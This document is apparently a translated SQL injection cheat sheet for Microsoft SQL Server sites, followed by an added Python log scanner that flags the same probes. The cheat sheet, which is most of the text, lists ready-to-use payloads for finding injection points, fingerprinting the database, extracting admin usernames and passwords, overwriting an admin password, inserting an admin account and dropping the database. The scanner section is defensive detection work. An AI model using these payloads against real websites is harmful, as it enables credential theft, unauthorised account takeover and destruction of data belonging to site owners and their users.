Identifying injection points:
1. Numeric
http://www.targer.com/article.aspx?id=1
http://www.targer.com/article.aspx?id=1'
http://www.targer.com/article.aspx?id=1 and 1=1
http://www.targer.com/article.aspx?id=1 and 1=2
2. String
http://www.targer.com/article.aspx?action=value' and 1=1
http://www.targer.com/article.aspx?action=value' and 1=2
3. Search
searchpoints%' and 1=1
searchpoints%' and 1=2
Determining the database type:
http://www.targer.com/article.aspx?id=1 and user>0
http://www.targer.com/article.aspx?id=1 and (select count(*) from sysobjects)>0
Querying current user data:
article.aspx?id=1 having 1=1--
Exposing the columns of the current table:
article.aspx?id=1 group by admin.username having 1=1--
article.aspx?id=1 group by admin.username,admin.password having 1=1--
Exposing arbitrary tables and columns:
and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top 1 col_name(object_id('admin'),N) from sysobjects)>1
Exposing database data:
and (select top 1 password from admin where id=N)>1
Modifying data in the database:
;update admin set password='oooooo' where username='xxx'
Adding data to the database:
;insert into admin values (xxx,oooooo)--
Dropping the database:
;drop database webdata
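Summary of common SQL:
Get the current database user name: and user>0
Get the current database name: and db_name()>0
Get the database version: and (select @@version)>0
Check whether multi-statement (stacked) queries are supported: ;declare @a int--
Check whether subqueries are supported: and (select count(1) from [sysobjects])>=0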
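From the defender's side, the probes listed above leave recognisable traces in web server logs. The following is an added example, not part of the original page: a small log scanner whose signatures are derived from the strings on this page. The 'client method target' log format, the signature names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Signatures derived from the probe strings listed on this page (MSSQL).
SIGNATURES = {
    "boolean_test": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "having_probe": re.compile(r"\bhaving\s+1\s*=\s*1\b", re.I),
    "catalog_access": re.compile(r"\bsysobjects\b|\b(col_name|object_id)\s*\(", re.I),
    "fingerprint": re.compile(r"\band\s+user\s*>\s*0|\bdb_name\s*\(|@@version", re.I),
    "stacked_query": re.compile(r";\s*(declare|update|insert|drop)\b", re.I),
}

def parse(line):
    """Split a 'client method target' log line; return (client, path, decoded query)."""
    client, _method, target = line.split(" ", 2)
    parts = urlsplit(target)
    return client, parts.path, unquote_plus(parts.query)

def classify(query):
    """Names of all signatures that match a decoded query string, sorted."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))

def scan(lines):
    """(client, path, matched signatures) for every request with at least one hit."""
    hits = [(c, p, classify(q)) for c, p, q in map(parse, lines)]
    return [h for h in hits if h[2]]

def paired_boolean_probes(lines):
    """(client, path) pairs that received both `and 1=1` and `and 1=2`."""
    seen = {}
    for client, path, query in map(parse, lines):
        for value in re.findall(r"\band\s+1\s*=\s*([12])\b", query, re.I):
            seen.setdefault((client, path), set()).add(value)
    return sorted(key for key, values in seen.items() if values == {"1", "2"})

# Constructed sample access-log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    "198.51.100.7 GET /article.aspx?id=1",
    "203.0.113.9 GET /article.aspx?id=1%20and%201=1",
    "203.0.113.9 GET /article.aspx?id=1%20and%201=2",
    "203.0.113.9 GET /article.aspx?id=1%20and%20(select%20count(*)%20from%20sysobjects)>0",
    "203.0.113.9 GET /article.aspx?id=1%20having%201=1--",
    "203.0.113.9 GET /article.aspx?id=1;declare%20@a%20int--",
    "198.51.100.7 GET /search.aspx?q=brand+1=1+offer",
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
    print("paired:", paired_boolean_probes(SAMPLE_LOG))
```

A single signature hit is a triage signal; the same client sending both the true and the false condition to one path is the stronger indicator that an injection point is being tested.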
Original source: http://wenku.baidu.com/link?url=HUz29K2oQStQY5xhqX84mI622D0tjsiuBN-seONO9YYf0OM12KlEs3Sw5pxwu1Iw2INeWJ-njqNKCWM2d7rMZ1cATTWiyBep5WO0bC2EFjW